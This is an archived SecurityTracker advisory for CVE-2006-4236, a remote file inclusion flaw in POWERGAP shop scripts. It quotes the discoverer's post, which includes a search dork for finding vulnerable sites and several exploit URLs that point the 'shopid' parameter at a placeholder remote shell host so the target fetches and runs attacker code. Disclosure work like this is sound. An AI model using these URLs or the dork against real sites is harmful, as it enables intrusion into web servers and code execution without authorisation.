SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   POWERGAP Vendors:   powergap.de
POWERGAP Include File Flaw in 'shopid' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016715
SecurityTracker URL:  http://securitytracker.com/id/1016715
CVE Reference:   CVE-2006-4236   (Links to External Site)
Updated:  Jun 5 2008
Original Entry Date:  Aug 18 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in POWERGAP. A remote user can include and execute arbitrary code on the target system.

The 's01.php', 's02.php', 's03.php', and 's04.php' scripts do not properly validate user-supplied input in the 'shopid' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/s01.php?shopid=http://[SHELLURL.COM]?

Saudi Hackrz discovered this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.powergap.de/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  powergap <= (s0x.php) Remote File Inclusion

#=================================================================

#powergap <= (s0x.php) Remote File Inclusion Exploit

#================================================================

#                                                                   |

#Critical Level : Dangerous                                 |

#                                                                   |

#Venedor site : http://www.powergap-shop.de   |

#                                                                   |

#http://www.demo-shop.com                           |

#                                                                   |

#=================================================================

#

#Dork: "powergap" or "s04.php" or s01.php or s02.php

#

#=================================================================

#Bug in : s01.php

#or s02.php 

#or s03.php

#or s04.php

#       

#

#=================================================================

#

#Exploit :

#--------------------------------

#

#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?

#http://sitename.com/s01.php?shopid=http://SHELLURL.COM?

#http://sitename.com/s02.php?shopid=http://SHELLURL.COM?

#http://sitename.com/s03.php?shopid=http://SHELLURL.COM?

#http://sitename.com/s04.php?shopid==http://SHELLURL.COM

#   or

#http://sitename.com/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://SHELLURL.COM

#http://sitename.com/sid=http://SHELLURL.COM

#===============================================================================

#Discoverd By : Saudi Hackrz

#

#Conatact : Saudi.unix[at]hotmail.com

#

#GreetZ : SnIpEr_Sa. Alarraab. SHiKaA. King18 

#www.3asfh.net

=================================================================




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC